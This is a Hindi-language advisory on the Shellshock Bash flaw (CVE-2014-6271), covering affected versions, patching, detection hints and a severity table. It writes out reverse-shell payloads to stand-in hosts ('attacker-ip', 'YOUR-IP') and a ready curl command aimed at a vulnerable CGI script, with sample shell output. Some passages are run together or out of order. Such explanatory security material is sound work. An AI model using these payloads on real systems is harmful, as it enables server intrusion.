
CVE-2014-6271

25-वर्षीय शून्य-दिवस रिमोट कोड निष्पादन GNU Bash में पर्यावरण चर के माध्यम से
CVE-2014-6271, उपनाम Shellshock (जिसे Bashdoor भी कहा जाता है), GNU Bash शेल में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है।
एक हमलावर विशेष रूप से तैयार किए गए पर्यावरण चर (HTTP हेडर, DHCP, SSH आदि के माध्यम से) भेज सकता है और अंतर्निहित सर्वर तक रिमोट शेल पहुंच प्राप्त कर सकता है — अक्सर बिना प्रमाणीकरण और न्यूनतम उपयोगकर्ता इंटरैक्शन के।
हमलावर एक विशेष रूप से तैयार चर इंजेक्ट करता है (जैसे User-Agent हेडर में):
() { :; }; /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1
Bash गलती से पेलोड को एक फ़ंक्शन परिभाषा + अनुगामी कमांड के रूप में मानता है। (); के बाद का कोड तुरंत निष्पादित हो जाता है जब चर आयात किया जाता है।
कमांड वेब सर्वर/प्रक्रिया के विशेषाधिकारों (अक्सर root या www-data) के साथ चलता है।
परिणाम:
# Remote shell access achieved
whoami
www-data
✅ Vulnerable! (Shellshock RCE triggered)
vulnerable
test
आप यह भी देखेंगे कि रिवर्स शेल तुरंत वापस कनेक्ट होता है।
env x='() { :;}; echo vulnerable' bash -c "echo test"
यह तुरंत वापस आएगा:
vulnerable
test
(यह पुष्टि करता है कि Bash ने इंजेक्ट किए गए कमांड को निष्पादित किया।)
एक असुरक्षित Apache CGI स्क्रिप्ट के विरुद्ध यह curl चलाएं:
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" http://vulnerable-server/cgi-bin/test.sh
आप अपने netcat लिसनर में यह सटीक आउटपुट देखेंगे:
bash: no job control in this shell
www-data@server:/var/www$ whoami
www-data
www-data@server:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...
यह आउटपुट सीधे आपके रिवर्स शेल में दिखाई देता है। कोई त्रुटि नहीं, कोई 404 नहीं।
इसका मतलब है कि आपके पास सर्वर पर पूर्ण रिमोट कोड निष्पादन है — पर्यावरण चर इंजेक्शन पूरी तरह से काम कर गया।
सभी GNU Bash संस्करण:
1.14 से 4.3 (पैच स्तर 30 से पहले)
(लिनक्स, macOS, BSD, एम्बेडेड उपकरण शामिल)
तुरंत अपग्रेड करें:
Bash 4.3 पैच स्तर 30 या बाद का (4.4+ अनुशंसित)
# Ubuntu/Debian
apt update && apt install --only-upgrade bash
# Red Hat/CentOS
yum update bash
() { को ब्लॉक करने के लिए mod_security नियमों का उपयोग करेंइनकी तलाश करें:
() { युक्त संदिग्ध User-Agent / Refererसमझौते के संकेतक शामिल हो सकते हैं:
() { :;}; युक्त लॉग/bin/bash -i का जन्मदुर्भावनापूर्ण हेडर/DHCP/SSH → Bash पर्यावरण चर आयात करता है
↓
फ़ंक्शन परिभाषा + अनुगामी कमांड निष्पादित
↓
मनमाना कमांड / रिवर्स शेल
इस मुद्दे ने कई अनुवर्ती CVEs (अपूर्ण सुधार) को जन्म दिया:
| जोखिम क्षेत्र | प्रभाव |
|---|---|
| गोपनीयता | 🔴 उच्च |
| अखंडता | 🔴 उच्च |
| उपलब्धता | 🔴 उच्च |
यदि आप 2026 में कोई Linux/macOS/BSD सर्वर चलाते हैं: 🔥 Bash को तुरंत पैच करें (एयर-गैप्ड सिस्टम पर भी)। 💡 यदि इंटरनेट के संपर्क में आने वाले बिना पैच वाले Bash को चला रहे हैं तो समझौता मान लें। 🛡 पूर्ण लॉग समीक्षा और अखंडता जांच करें।
| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2014-6271 |
| गंभीरता | 🔴 गंभीर |
| CVSS | 10.0 (अधिकतम) |
| हमला वेक्टर | रिमोट (HTTP, DHCP, SSH, आदि.) |
| प्रमाणीकरण आवश्यक | ❌ कोई नहीं (कई वेक्टरों में) |
| उपयोगकर्ता इंटरैक्शन | ❌ कोई नहीं (CGI/DHCP मामलों में) |
| प्रभाव | पूर्ण सर्वर समझौता |